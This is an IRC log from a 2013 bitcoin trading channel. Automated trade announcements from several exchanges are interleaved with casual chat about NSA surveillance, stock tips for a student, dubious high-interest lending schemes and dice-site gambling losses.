[BTCTC] [TAT.ASICMINER] 2 @ 0.0465 = 0.093 BTC [-] Jul 24 20:41:04 [BTCTC] [TAT.ASICMINER] 10 @ 0.0465 = 0.465 BTC [-] Jul 24 20:41:08 [HAVELOCK] [AM100] 63 @ 0.0446998 = 2.8161 BTC [+] Jul 24 20:42:42 [BTCTC] [TAT.ASICMINER] 11 @ 0.047 = 0.517 BTC [+] Jul 24 20:42:45 [BTCTC] [TAT.ASICMINER] 14 @ 0.047 = 0.658 BTC [+] Jul 24 20:43:05 [BTCTC] [ASICMINER-PT] 1 @ 4.75 BTC [+] Jul 24 20:43:09 [BTCTC] [TAT.ASICMINER] 45 @ 0.04555 = 2.0498 BTC [-] Jul 24 20:43:14 [BTCTC] [TAT.ASICMINER] 30 @ 0.04554 = 1.3662 BTC [-] Jul 24 20:48:05 Xerxes32: what did the Republicans do now? Jul 24 20:48:16 [HAVELOCK] [SMG] 174 @ 0.00027 = 0.047 BTC [-] Jul 24 20:50:07 [MPEX] [S.MPOE] 936 @ 0.00080322 = 0.7518 BTC [-] Jul 24 20:50:17 [MPEX] [S.MPOE] 10364 @ 0.00079942 = 8.2852 BTC [-] Jul 24 20:51:46 [BTCTC] [BASIC-MINING] 27 @ 0.4601 = 12.4227 BTC [-] Jul 24 20:51:46 [BTCTC] [BASIC-MINING] 33 @ 0.4601 = 15.1833 BTC [-] Jul 24 20:51:46 [BTCTC] [BASIC-MINING] 1 @ 0.4601 BTC [-] Jul 24 20:53:12 [BTCTC] [BTC-TRADING-PT] 5 @ 0.8847 = 4.4235 BTC [+] Jul 24 20:54:10 ThickAsThieves sweet. nsa defected. Jul 24 20:54:39 [BTCTC] [BASIC-MINING] 10 @ 0.46 = 4.6 BTC [-] Jul 24 20:54:39 what up Jul 24 20:54:48 [BTCTC] [ASICMINER-PT] 5 @ 4.75 = 23.75 BTC [+] Jul 24 20:54:53 hey mircea_popescu: tell mpoe-pr that she is the best, if you speak with her Jul 24 20:55:03 [BTCTC] [TAT.ASICMINER] 1 @ 0.04554 BTC [-] Jul 24 20:55:47 [BTCTC] [ASICMINER-PT] 2 @ 4.75 = 9.5 BTC [+] Jul 24 20:56:03 [BTCTC] [TAT.ASICMINER] 24 @ 0.04554 = 1.093 BTC [-] Jul 24 20:56:08 [BTCTC] [TAT.ASICMINER] 2 @ 0.04554 = 0.0911 BTC [-] Jul 24 20:57:34 this would just be the NSA throwing a bone anyway Jul 24 20:57:51 what did NSA do? Jul 24 20:59:42 lol mjr_ what did she do ? Jul 24 20:59:47 PeterL_ http://trilema.com/2013/the-cold-war-experts-over-here-are-having-a-ball-these-days/ Jul 24 21:00:21 nah ThickAsThieves. teh system is crumbling. Jul 24 21:02:08 she wrote something nice on the forums Jul 24 21:02:25 meant a lot, since she is a tough cookie Jul 24 21:02:29 [BTCTC] [BITVPS] 669 @ 0.002 = 1.338 BTC [+] Jul 24 21:02:32 whoa really? Jul 24 21:03:47 yep Jul 24 21:03:55 unless it was missed sarcasm... Jul 24 21:03:58 which is also possible Jul 24 21:04:03 cool. Jul 24 21:04:07 i was dealing with gweedo Jul 24 21:04:14 hehe Jul 24 21:04:22 who for some reason thinks that because he can't benefit from quick liquidity, it won't ever work Jul 24 21:04:34 nevermind the fact that it has been working since may, and no one cares what he thinks anway Jul 24 21:04:57 so, after most people told him to stfu, he was whining Jul 24 21:05:00 The amendment, led by Rep. Justin Amash (R-MI), would stop the NSA's phone metadata program from collecting millions of Americans' communications records without suspicion of a crime. --- I really want him to run for senator and get elected Jul 24 21:05:09 [HAVELOCK] [HIM] 1 @ 0.24 BTC [+] Jul 24 21:05:13 and mpoe-pr came in and said "I think this kid is going places..." Jul 24 21:05:17 about me Jul 24 21:05:21 which was sweet Jul 24 21:05:32 was she being sarcastic? Jul 24 21:05:40 possibly, but in this situation, i don't think so Jul 24 21:05:44 lol no way to tell with mp Jul 24 21:05:48 mppr i mean Jul 24 21:05:50 she usually is very blunt Jul 24 21:05:55 [HAVELOCK] [HIM] 1 @ 0.25 BTC [+] Jul 24 21:06:01 so most people def know if she was calling them an idiot Jul 24 21:06:02 she is probably a dude btw :P Jul 24 21:06:07 i've met her Jul 24 21:06:08 not a dude Jul 24 21:06:15 :o Jul 24 21:06:15 that is her real picture Jul 24 21:06:15 [HAVELOCK] [HIM] 1 @ 0.25499999 BTC [+] Jul 24 21:06:24 she wasn't being sarcastic. Jul 24 21:06:42 [BTCTC] [TAT.MINIGAME] 8 @ 0.000267 = 0.0021 BTC [-] Jul 24 21:06:44 she is probably a dude btw :P Jul 24 21:06:44 i've met her Jul 24 21:06:44 not a dude << priceless lol Jul 24 21:06:44 [BTCTC] [TAT.MINIGAME] 2 @ 0.000265 = 0.0005 BTC [-] Jul 24 21:06:46 [BTCTC] [TAT.MINIGAME] 90 @ 0.0002613 = 0.0235 BTC [-] Jul 24 21:07:28 i just assume everyone is a dude on the internet, safer that way Jul 24 21:07:37 i was honestly really surprised to read her on the internet Jul 24 21:07:51 she is not like that at all (at least not around us) in person Jul 24 21:08:02 she was very nice, and somewhat quiet actually Jul 24 21:08:18 ya cause she was thinking up what to write D: Jul 24 21:08:24 hehehe Jul 24 21:09:34 [BTCTC] [AMC-PT] 646 @ 0.003503 = 2.2629 BTC [-] Jul 24 21:09:36 [BTCTC] [AMC-PT] 20 @ 0.003502 = 0.07 BTC [-] Jul 24 21:09:37 [BTCTC] [AMC-PT] 22 @ 0.0035 = 0.077 BTC [-] Jul 24 21:09:39 [BTCTC] [AMC-PT] 250 @ 0.0035 = 0.875 BTC [-] Jul 24 21:09:42 [BTCTC] [AMC-PT] 212 @ 0.0035 = 0.742 BTC [-] Jul 24 21:09:49 those were good times, i cannot wait for next years Jul 24 21:10:45 [BTCTC] [TAT.ASICMINER] 48 @ 0.04554 = 2.1859 BTC [-] Jul 24 21:10:45 [BTCTC] [TAT.ASICMINER] 10 @ 0.04554 = 0.4554 BTC [-] Jul 24 21:10:45 [BTCTC] [TAT.ASICMINER] 117 @ 0.04552 = 5.3258 BTC [-] Jul 24 21:11:15 [HAVELOCK] [SMG] 7 @ 0.00026811 = 0.0019 BTC [-] Jul 24 21:11:20 [HAVELOCK] [SMG] 9 @ 0.0002681 = 0.0024 BTC [-] Jul 24 21:11:27 [HAVELOCK] [SMG] 100 @ 0.00026801 = 0.0268 BTC [-] Jul 24 21:11:33 [HAVELOCK] [SMG] 1000 @ 0.000268 = 0.268 BTC [-] Jul 24 21:11:37 [BTCTC] [BASIC-MINING] 10 @ 0.42 = 4.2 BTC [-] Jul 24 21:11:39 [BTCTC] [BASIC-MINING] 1 @ 0.4175 BTC [-] Jul 24 21:11:41 [BTCTC] [BASIC-MINING] 10 @ 0.405 = 4.05 BTC [-] Jul 24 21:11:43 [BTCTC] [BASIC-MINING] 2 @ 0.401 = 0.802 BTC [-] Jul 24 21:11:43 [BTCTC] [BASIC-MINING] 5 @ 0.4 = 2 BTC [-] Jul 24 21:11:44 [HAVELOCK] [SMG] 2372 @ 0.0002671 = 0.6336 BTC [-] Jul 24 21:11:47 [BTCTC] [BASIC-MINING] 80 @ 0.4 = 32 BTC [-] Jul 24 21:11:52 [HAVELOCK] [SMG] 2000 @ 0.000267 = 0.534 BTC [-] Jul 24 21:12:51 [BTCTC] [BITVPS] 9 @ 0.00199 = 0.0179 BTC [-] Jul 24 21:14:00 [BTCTC] [AMC-PT] 2 @ 0.003677 = 0.0074 BTC [+] Jul 24 21:14:01 [BTCTC] [COGNITIVE] 3 @ 0.6001 = 1.8003 BTC [-] Jul 24 21:14:58 [BTCTC] [AMC-PT] 535 @ 0.003482 = 1.8629 BTC [-] Jul 24 21:15:00 [BTCTC] [AMC-PT] 465 @ 0.003481 = 1.6187 BTC [-] Jul 24 21:15:43 mircea_popescu: Why do you point to August specifically, in that article? Jul 24 21:15:45 [HAVELOCK] [SMG] 1 @ 0.00027 BTC [+] Jul 24 21:16:10 [BTCTC] [BITVPS] 9 @ 0.001991 = 0.0179 BTC [+] Jul 24 21:16:28 just random really. Jul 24 21:16:31 but august is a hard month. Jul 24 21:16:48 [BTCTC] [AMC-PT] 323 @ 0.003481 = 1.1244 BTC [-] Jul 24 21:16:55 [BTCTC] [COGNITIVE] 2 @ 0.66 = 1.32 BTC [+] Jul 24 21:17:22 [BTCTC] [AMC-PT] 1000 @ 0.003481 = 3.481 BTC [-] Jul 24 21:18:42 [BTCTC] [KENILWORTH] 300 @ 0.0018 = 0.54 BTC [-] Jul 24 21:19:22 [BTCTC] [BASIC-MINING] 10 @ 0.4085 = 4.085 BTC [+] Jul 24 21:21:26 [BTCTC] [BTC-TRADING-PT] 1 @ 0.8328 BTC [-] Jul 24 21:21:27 [BTCTC] [ASICMINER-PT] 2 @ 4.755 = 9.51 BTC [+] Jul 24 21:22:10 [HAVELOCK] [SDSTM] 1 @ 0.01 BTC [-] Jul 24 21:22:21 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003004 = 0.03 BTC [-] Jul 24 21:22:26 finally in the same chat room as mirceau, congrats on the success of your site. If the entry wasn't so high, I'd be a trader with your services myself. Jul 24 21:22:56 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.003004 = 0.015 BTC [-] Jul 24 21:23:12 im a 2nd year finance student, any advice? Jul 24 21:23:18 quit Jul 24 21:23:55 lol im double majoring in accounting as a backup if after 5 or so years i burn out like many due in the finance sector. Jul 24 21:23:57 do* Jul 24 21:24:00 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.003004 = 0.015 BTC [-] Jul 24 21:24:07 [HAVELOCK] [SMG] 30 @ 0.0002661 = 0.008 BTC [-] Jul 24 21:24:39 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.003004 = 0.015 BTC [-] Jul 24 21:24:42 [BTCTC] [BITVPS] 1 @ 0.001991 BTC [+] Jul 24 21:25:04 kingofsports the usual burnout is heart failure Jul 24 21:25:08 stocks have been doing wel, i bought 1000 shares of SIRI couple months back at 2.8 and 3 years ago i still have my LVS i bought 100 shares of for $6.50, last i checked in the 30s or 40s Jul 24 21:25:12 [HAVELOCK] [SMG] 25 @ 0.00027 = 0.0068 BTC [+] Jul 24 21:25:13 so i doubt you'll need an accounting backup if you're serious Jul 24 21:25:21 oh wow Jul 24 21:25:22 and there's no u in mircea Jul 24 21:25:32 sorry i realized that after i typed it Jul 24 21:25:47 [BTCTC] [CRYPTO-TRADE] 8 @ 0.192 = 1.536 BTC [-] Jul 24 21:26:05 it's a running joke you know ? the better fund managers get their first heart attack in their 30s Jul 24 21:26:11 it's the losers that wait to be 40. Jul 24 21:26:23 [BTCTC] [ASICMINER-PT] 5 @ 4.763 = 23.815 BTC [+] Jul 24 21:27:34 haha yeah I figured. I'm still learning about all the different trading options, i understand options and normal buy/sell and long/short but futures I don't understand well yet. Jul 24 21:28:00 [BTCTC] [AMC-PT] 282 @ 0.00348 = 0.9814 BTC [-] Jul 24 21:28:03 [BTCTC] [AMC-PT] 10 @ 0.003471 = 0.0347 BTC [-] Jul 24 21:28:04 [BTCTC] [AMC-PT] 20 @ 0.00347 = 0.0694 BTC [-] Jul 24 21:28:05 [BTCTC] [AMC-PT] 3920 @ 0.00347 = 13.6024 BTC [-] Jul 24 21:28:17 then you'll make a great trader Jul 24 21:28:39 [BTCTC] [BITVPS] 941 @ 0.00199 = 1.8726 BTC [-] Jul 24 21:28:43 [BTCTC] [ASICMINER-PT] 10 @ 4.783 = 47.83 BTC [+] Jul 24 21:28:44 [BTCTC] [BITVPS] 10 @ 0.001974 = 0.0197 BTC [-] Jul 24 21:28:46 [BTCTC] [BITVPS] 555 @ 0.00196 = 1.0878 BTC [-] Jul 24 21:28:52 lol Jul 24 21:29:11 [HAVELOCK] [AM100] 154 @ 0.0438001 = 6.7452 BTC [-] Jul 24 21:29:14 [BTCTC] [ASICMINER-PT] 3 @ 4.79 = 14.37 BTC [+] Jul 24 21:29:16 [BTCTC] [ASICMINER-PT] 10 @ 4.79 = 47.9 BTC [+] Jul 24 21:29:16 haha i hope so. I used to handle my grandmother's portfolio, she had AIG and after the huge drop she didnt trust anyone who claimed to know what they were doing Jul 24 21:29:19 lol pigeons Jul 24 21:29:46 [HAVELOCK] [AM100] 154 @ 0.0438001 = 6.7452 BTC [-] Jul 24 21:29:58 [BTCTC] [BTC-TRADING-PT] 6 @ 0.8025 = 4.815 BTC [-] Jul 24 21:29:58 I didn't do much cause I was only 16 and only knew what I saw from watching madmoney daily and cnbc from 4-6pm. Jul 24 21:30:09 the hell was your grandma doing with a symbol portofolio. Jul 24 21:30:14 but i made her a couple thousand. Jul 24 21:30:25 dunno lol Jul 24 21:30:32 she inherited a ton of shares of AIG Jul 24 21:30:38 and sold it and said here u invest them for me Jul 24 21:30:45 ah. Jul 24 21:30:46 [BTCTC] [TAT.ASICMINER] 5 @ 0.04679 = 0.234 BTC [+] Jul 24 21:30:54 cause she knew i watched stocks and investing shows like 3 hrs daily when i got home from school. Jul 24 21:31:06 very risk sensitive pots like that are usually invested in indexes/index funds. Jul 24 21:31:11 [BTCTC] [GSDPT] 1 @ 0.00345 BTC [+] Jul 24 21:31:24 but i guess she enjoys living on the edge Jul 24 21:31:32 [BTCTC] [LTC-ATF.B2] 3 @ 0.01006 = 0.0302 BTC [-] Jul 24 21:31:34 [BTCTC] [LTC-ATF.B2] 3 @ 0.01005 = 0.0302 BTC [-] Jul 24 21:31:36 [BTCTC] [LTC-ATF.B2] 100 @ 0.01002 = 1.002 BTC [-] Jul 24 21:31:37 [BTCTC] [LTC-ATF.B2] 10 @ 0.01002 = 0.1002 BTC [-] Jul 24 21:31:40 [BTCTC] [LTC-ATF.B2] 35 @ 0.01002 = 0.3507 BTC [-] Jul 24 21:31:50 [BTCTC] [LTC-ATF.B2] 1 @ 0.01002 BTC [-] Jul 24 21:31:52 [BTCTC] [LTC-ATF.B2] 10 @ 0.01001 = 0.1001 BTC [-] Jul 24 21:31:54 [BTCTC] [LTC-ATF.B2] 10 @ 0.010002 = 0.1 BTC [-] Jul 24 21:31:56 [BTCTC] [LTC-ATF.B2] 148 @ 0.010001 = 1.4801 BTC [-] Jul 24 21:32:34 [BTCTC] [AMC-PT] 589 @ 0.003462 = 2.0391 BTC [-] Jul 24 21:34:15 [BTCTC] [ASICMINER-PT] 3 @ 4.794 = 14.382 BTC [+] Jul 24 21:34:22 so are there any stocks you like mircea that you would be long on? Only have a couple thousand available to invest and currently only have SIRI and LVS. thinking of selling SIRI if it reaches 4, I just don't see them growing rapidly like their stock has. I know this is prob bad reason. Their sales have been good but still nowhere near full expectations. Jul 24 21:34:36 [HAVELOCK] [SMG] 93 @ 0.0002661 = 0.0247 BTC [-] Jul 24 21:34:39 [BTCTC] [TAT.ASICMINER] 1 @ 0.0456 BTC [-] Jul 24 21:34:57 i know your all BTC stocks right now, but im kind of bear BTC atm so looking for a fiat investment. just looking for some stock ideas to look into myself for a long position. Jul 24 21:34:59 [BTCTC] [AMC-PT] 15 @ 0.003461 = 0.0519 BTC [-] Jul 24 21:35:09 i'm glad you learned to stop taking advice from tv stockpickers and moved to irc bitcoin people Jul 24 21:35:22 lol Jul 24 21:35:24 safaricom (but no ones asking me :P) Jul 24 21:35:25 pigeons its not like im gonna go jump on it right away... Jul 24 21:35:25 ha Jul 24 21:35:34 just looking for some stocks to look into Jul 24 21:35:37 [BTCTC] [AMC-PT] 1485 @ 0.003461 = 5.1396 BTC [-] Jul 24 21:35:48 and do research on, like if u know some obscure stock i prob wouldnt know of it. Jul 24 21:35:49 [BTCTC] [TAT.ASICMINER] 5 @ 0.04552 = 0.2276 BTC [-] Jul 24 21:36:11 plastics Jul 24 21:36:20 kingofsports your enthusiasm is commendable, but srsly, this isn't really how it;s done. Jul 24 21:37:03 [BTCTC] [KENILWORTH] 1 @ 0.0018 BTC [-] Jul 24 21:37:16 i figured haha just wondered what people were investing in here these days. Jul 24 21:37:25 [HAVELOCK] [SMG] 1964 @ 0.0002661 = 0.5226 BTC [-] Jul 24 21:37:32 [BTCTC] [TAT.MINIGAME] 10 @ 0.0002613 = 0.0026 BTC [-] Jul 24 21:37:39 [HAVELOCK] [SMG] 380 @ 0.00026602 = 0.1011 BTC [-] Jul 24 21:37:41 [HAVELOCK] [SMG] 1168 @ 0.00026601 = 0.3107 BTC [-] Jul 24 21:37:42 i didn't know kenilworth made it onto btctc is it just me or does that reek of scam? Jul 24 21:37:44 [BTCTC] [TAT.MINIGAME] 100 @ 0.0002612 = 0.0261 BTC [-] Jul 24 21:37:44 i don't trust the us stock market anyway Jul 24 21:37:46 [BTCTC] [TAT.MINIGAME] 169 @ 0.000261 = 0.0441 BTC [-] Jul 24 21:37:47 [BTCTC] [TAT.MINIGAME] 221 @ 0.000261 = 0.0577 BTC [-] Jul 24 21:37:54 Duffer it's not just you. Jul 24 21:38:06 question though, do you think tradefortress is legit/genuine? Jul 24 21:38:27 I have considered using some of his products but after reading all about the pirate story I have my doubts. Jul 24 21:38:42 i don't think he'll rip you off if that's what you're asking Jul 24 21:38:48 okay Jul 24 21:39:11 well... he's a little wild young;un, but i think fundamentally honest. Jul 24 21:39:31 what pirate story ? if memory serves he's newer than the collapse of that Jul 24 21:39:38 okay thanks Jul 24 21:39:54 the whole ponzi scheme by pirate, high yield interest similar to coinlenders i think it was. Jul 24 21:40:01 [BTCTC] [TAT.ASICMINER] 5 @ 0.04552 = 0.2276 BTC [-] Jul 24 21:40:16 [BTCTC] [AMC-PT] 24 @ 0.003669 = 0.0881 BTC [+] Jul 24 21:40:20 coinlender pays like 5% a month neh ? Jul 24 21:40:26 2% Jul 24 21:40:34 so how is 1% a day similar to 2% a month ? Jul 24 21:40:43 oh it was 1%, nvm then Jul 24 21:40:49 that definitely is too unrealistic. Jul 24 21:41:16 i just dont understand how tradefortress can pay such high interest. 2% is high considering he rec'd over 4000 last I talked to him from coinlenders. Jul 24 21:41:43 [BTCTC] [TAT.ASICMINER] 13 @ 0.04679 = 0.6083 BTC [+] Jul 24 21:41:53 kingofsports the interest isn't high based on the capital dood. Jul 24 21:41:55 I feel like if people were offered 1% it would be more of get your money in and out as fast as possible. I feel most HAD to know it was a ponzi. Jul 24 21:42:23 for that matter mpoe bonds have 10's of k's invested and pay about 5 to 10% historically. Jul 24 21:42:31 oh okay, I just didn't think he could fill 4000 BTC worth of loans in a month for serious applicants. Jul 24 21:42:33 hindsight is 20/20 Jul 24 21:42:50 well now that may be problematic indeed. maybe he just finances himself or w/e Jul 24 21:43:00 yeah Jul 24 21:43:03 [BTCTC] [AMC-PT] 1 @ 0.00367 BTC [+] Jul 24 21:43:32 are there any passthru sites for mpex by the way? Jul 24 21:43:51 there's coinbr.com which brokers for you Jul 24 21:44:00 I will look into that, thank you. Jul 24 21:44:08 there's pts run by namworld, ThickAsThieves, deadterra iirc Jul 24 21:44:19 i hope i've not forgotten anyone Jul 24 21:44:24 ah okay cool Jul 24 21:44:44 [BTCTC] [AMC-PT] 14 @ 0.003669 = 0.0514 BTC [-] Jul 24 21:44:54 oh some enthusiastic investor is here Jul 24 21:45:11 [BTCTC] [DMS.MINING] 50 @ 0.0129 = 0.645 BTC [-] Jul 24 21:45:22 haha Jul 24 21:45:45 go all in JPM, can't go wrong Jul 24 21:46:27 topace Jul 24 21:46:34 [BTCTC] [BTC-BOND] 10 @ 0.009998 = 0.1 BTC [-] Jul 24 21:46:36 well not anymore, yeah Jul 24 21:46:37 [BTCTC] [BTC-BOND] 14 @ 0.009999 = 0.14 BTC [+] Jul 24 21:47:21 [BTCTC] [TAT.ASICMINER] 2 @ 0.04552 = 0.091 BTC [-] Jul 24 21:47:40 I assume people who buy from mpex just say it here in chat if I read the FAQ correct. Or they use terminal or something. Sadly I cannot figure out to get my terminal to accept my gpg key. I've tried couple times sigh. Jul 24 21:48:01 get your terminal to accept it? Jul 24 21:48:06 wtf Jul 24 21:48:21 and this is nice: https://github.com/gabridome/mpex-sh/blob/master/mpex.sh Jul 24 21:48:34 dunno when i tried setting it up i had to type a message into terminal of my mac and it was unable to decrypt it. Jul 24 21:48:43 was a week or two ago i tried to do it. Jul 24 21:49:11 [BTCTC] [AMC-PT] 40 @ 0.003668 = 0.1467 BTC [-] Jul 24 21:49:13 [BTCTC] [AMC-PT] 43 @ 0.003669 = 0.1578 BTC [+] Jul 24 21:49:14 [BTCTC] [AMC-PT] 47 @ 0.00367 = 0.1725 BTC [+] Jul 24 21:49:15 [BTCTC] [AMC-PT] 100 @ 0.003677 = 0.3677 BTC [+] Jul 24 21:49:23 [BTCTC] [AMC-PT] 200 @ 0.003678 = 0.7356 BTC [+] Jul 24 21:49:28 sounds like some help from #gnupg, don't mention mpex ;) Jul 24 21:49:44 are all the things said by assbot actuall trades being made? Jul 24 21:49:54 pigeons: lol, why is that? Jul 24 21:49:55 ys Jul 24 21:49:59 yes Jul 24 21:50:08 oh okay they seem bot like Jul 24 21:50:09 [BTCTC] [ASICMINER-PT] 1 @ 4.794 BTC [+] Jul 24 21:50:25 sounds like some help from #gnupg, don't mention mpex ;) << what, are they pissy @mpex ?! Jul 24 21:50:26 @assbot is short for asset-bot Jul 24 21:50:36 ohhh Jul 24 21:50:52 [BTCTC] [DMS.SELLING] 15 @ 0.01988 = 0.2982 BTC [-] Jul 24 21:51:51 [BTCTC] [DMS.MINING] 8 @ 0.01266 = 0.1013 BTC [-] Jul 24 21:51:51 no they aren't pissy at mpex yet, until a bunch of jim carmers start needing help getting their terminals to accept it Jul 24 21:52:15 a. ty mr strategic thinker, that's a good point. Jul 24 21:52:16 sorry if i offended anyone. Jul 24 21:52:32 kingofsports relax, we're just crabby because we're old and can't get it up anymore. Jul 24 21:52:41 lol Jul 24 21:52:56 you didnt offend anyone, you're fine, i won't stop teasing you yet though Jul 24 21:53:00 pigeons: hahah, nice. Jul 24 21:53:15 haha okay Jul 24 21:53:17 [BTCTC] [LTC-MINING] 1 @ 0.3009 BTC [-] Jul 24 21:53:19 [BTCTC] [LTC-MINING] 1 @ 0.3008 BTC [-] Jul 24 21:53:21 [BTCTC] [LTC-MINING] 2 @ 0.3001 = 0.6002 BTC [-] Jul 24 21:53:35 by the way, bugpowder who was in here might not be back for a bit Jul 24 21:53:42 [BTCTC] [LTC-MINING] 14 @ 0.292 = 4.088 BTC [-] Jul 24 21:53:53 why? Jul 24 21:53:54 he referred me to this room if i ever wanted to talk trading. Jul 24 21:53:59 he lost 1200 BTC last night Jul 24 21:54:05 hehe Jul 24 21:54:14 just-dice.com Jul 24 21:54:14 lol Jul 24 21:54:16 how ? ahaha Jul 24 21:54:24 :D Jul 24 21:54:27 he has more to lose surely Jul 24 21:54:36 [BTCTC] [ASICMINER-PT] 1 @ 4.794 BTC [+] Jul 24 21:54:44 he was invested then started gambling for a couple coins nightly Jul 24 21:54:49 well last night it did him in Jul 24 21:55:02 he still has like 600 i think dunno tho he cashed it all off the site Jul 24 21:55:06 !help Jul 24 21:55:07 List of commands: Jul 24 21:55:08 !ticker (desc: returns current ticker values, supported: MPEX, HAVELOCK, BTCTCO) {short: !t} Jul 24 21:55:09 !last (desc: returns last price value, supported: MPEX, HAVELOCK, BTCTCO) {short: !l} Jul 24 21:55:10 !mp (desc: returns the response from MPEX order) Jul 24 21:55:11 !rules (desc: chan guidelines) {short: !r} Jul 24 21:55:12 !exchanges (desc: lists exchanges and brokers) {short: !e} Jul 24 21:55:30 [BTCTC] [ASICMINER-PT] 1 @ 4.794 BTC [+] Jul 24 21:55:30 [BTCTC] [ASICMINER-PT] 9 @ 4.794 = 43.146 BTC [+] Jul 24 21:55:49 someone paid me 5 BTC for my account on just-dice.com they wanted a low acccount number for chat...dunno why but hey almost $500 free basically. Jul 24 21:56:09 [BTCTC] [BASIC-MINING] 1 @ 0.45 BTC [+] Jul 24 21:56:10 prolly a scammer. Jul 24 21:56:18 nah they changed the username Jul 24 21:56:31 dooglus oversaw it, it was a whale who wanted a low number for chat i had #11 Jul 24 21:56:34 thats... odd Jul 24 21:56:38 [BTCTC] [KENILWORTH] 30 @ 0.0018 = 0.054 BTC [-] Jul 24 21:56:39 a ok Jul 24 21:56:56 kingofsports, still doesn't exclude the possibility of him being a scammer Jul 24 21:57:02 yeah i know but hey im not complaining haha. Jul 24 21:57:05 especially since everyone has only his tormail Jul 24 21:57:25 kingofsports: so was it bugpowder that put just-dice back in the black? Jul 24 21:57:27 true apo but he wa s a whale player and dooglus reset the account, i have kingofsports again his username on there for #11 is banker. Jul 24 21:57:44 TomServo iirc site was in the black like 3k Jul 24 21:57:54 tomservo no the site was up 200 before he wagered and then someone said site up 1400 i came back to bugpowder upset n pissed. Jul 24 21:58:27 [BTCTC] [DMS.MINING] 25 @ 0.0129 = 0.3225 BTC [+] Jul 24 21:58:40 [HAVELOCK] [SDSTM] 2 @ 0.00991 = 0.0198 BTC [-] Jul 24 21:58:52 lol @ bugpowder Jul 24 21:59:19 scrat wishes bugs had played of his site :) Jul 24 21:59:51 Wasn't it down a good chunk as of last-weekish? Jul 24 21:59:51 you can be a whale with just 10 btc on mine Jul 24 21:59:57 scrat i know all dep and withdrawals are public on your site, how much are u up? Jul 24 22:00:11 yeah just-dice got taken for 4000 BTC by "celeste" Jul 24 22:00:25 kingofsports: 408 excluding expenses and promotions Jul 24 22:00:36 ah okay nice Jul 24 22:00:42 do u know how much has been wagered? Jul 24 22:00:47 [BTCTC] [DMS.SELLING] 10 @ 0.0195 = 0.195 BTC [-] Jul 24 22:00:47 [BTCTC] [AMC-PT] 70 @ 0.00368 = 0.2576 BTC [+] Jul 24 22:00:47 [BTCTC] [DMS.SELLING] 10 @ 0.019 = 0.19 BTC [-] Jul 24 22:00:54 it's on the stats page Jul 24 22:00:55 [BTCTC] [DMS.SELLING] 50 @ 0.01811 = 0.9055 BTC [-] Jul 24 22:00:55 kingofsports wasn't it like 1.2k once and then 4.6k or some shit on the 2nd pass ? Jul 24 22:00:55 [BTCTC] [DMS.SELLING] 50 @ 0.0181 = 0.905 BTC [-] Jul 24 22:00:57 44.5k Jul 24 22:01:07 [BTCTC] [DMS.SELLING] 50 @ 0.01801 = 0.9005 BTC [-] Jul 24 22:01:10 [BTCTC] [DMS.SELLING] 294 @ 0.018 = 5.292 BTC [-] Jul 24 22:01:12 [HAVELOCK] [HIM] 1 @ 0.24 BTC [-] Jul 24 22:01:20 [HAVELOCK] [HIM] 4 @ 0.242 = 0.968 BTC [+] Jul 24 22:01:31 its been up and down heavily. Jul 24 22:01:39 til jim crammer is actually a thing. Jul 24 22:01:40 down 4000 was highest i believe Jul 24 22:01:46 up 3000 was highest Jul 24 22:02:02 [BTCTC] [TAT.ASICMINER] 4 @ 0.046 = 0.184 BTC [+] Jul 24 22:02:24 [BTCTC] [TAT.ASICMINER] 15 @ 0.04679 = 0.7019 BTC [+] Jul 24 22:02:29 [BTCTC] [TAT.ASICMINER] 15 @ 0.04679 = 0.7019 BTC [+] Jul 24 22:02:51 wow so right around that 1% scrat Jul 24 22:03:04 you have any players up 100 coins or down 100? Jul 24 22:03:14 [HAVELOCK] [HIM] 4 @ 0.24 = 0.96 BTC [-] Jul 24 22:04:02 had one who went up 140 then back to +53 Jul 24 22:05:07 [BTCTC] [ASICMINER-PT] 3 @ 4.795 = 14.385 BTC [+] Jul 24 22:05:12 [BTCTC] [ASICMINER-PT] 2 @ 4.795 = 9.59 BTC [+] Jul 24 22:05:21 Scrat: you also have a dice site? Jul 24 22:05:38 [BTCTC] [ASICMINER-PT] 1 @ 4.724 BTC [-] Jul 24 22:05:42 [BTCTC] [DMS.MINING] 3 @ 0.0129 = 0.0387 BTC [+] Jul 24 22:05:56 [HAVELOCK] [HIM] 1 @ 0.248 BTC [+] Jul 24 22:06:34 [BTCTC] [BASIC-MINING] 1 @ 0.45 BTC [+] Jul 24 22:06:42 TomServo, not sure but he has +o on #coinroll :) Jul 24 22:06:43 [BTCTC] [AMC-PT] 1358 @ 0.003461 = 4.7 BTC [-] Jul 24 22:06:52 TomServo: https://coinroll.it Jul 24 22:07:22 cool Jul 24 22:07:22 are investors welcome Scrat like on jd? Jul 24 22:07:24 it is smalltime compared to JD Jul 24 22:07:52 MCM-Mike: for the time being no Jul 24 22:07:58 ok Jul 24 22:08:44 [BTCTC] [AMC-PT] 7 @ 0.003461 = 0.0242 BTC [-] Jul 24 22:09:29 [BTCTC] [DMS.MINING] 2 @ 0.0129 = 0.0258 BTC [+] Jul 24 22:09:35 [BTCTC] [ASICMINER-PT] 2 @ 4.795 = 9.59 BTC [+] Jul 24 22:10:18 wonder what the largest single profit and loss was on a trade on mpex. Jul 24 22:10:25 my guess is 2000 BTC Jul 24 22:10:50 if you ever are looking for investors scrat let me know :) Jul 24 22:11:02 [BTCTC] [DMS.PURCHASE] 1 @ 0.03392 BTC [+] Jul 24 22:11:59 kingofsports: will do Jul 24 22:12:31 [BTCTC] [AMC-PT] 5000 @ 0.00346 = 17.3 BTC [-] Jul 24 22:12:33 [BTCTC] [AMC-PT] 9 @ 0.003455 = 0.0311 BTC [-] Jul 24 22:12:38 [BTCTC] [TAT.ASICMINER] 10 @ 0.047 = 0.47 BTC [+] Jul 24 22:12:39 [BTCTC] [AMC-PT] 2991 @ 0.003455 = 10.3339 BTC [-] Jul 24 22:12:49 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.003227 BTC [+] Jul 24 22:12:50 [MPEX] [S.MG] 11750 @ 0.00025 = 2.9375 BTC [-] Jul 24 22:13:12 [HAVELOCK] [SMG] 92 @ 0.00026642 = 0.0245 BTC [+] Jul 24 22:13:13 [HAVELOCK] [SMG] 1332 @ 0.00026641 = 0.3549 BTC [-] Jul 24 22:13:16 [HAVELOCK] [SMG] 2157 @ 0.0002664 = 0.5746 BTC [-] Jul 24 22:13:18 [HAVELOCK] [SMG] 5000 @ 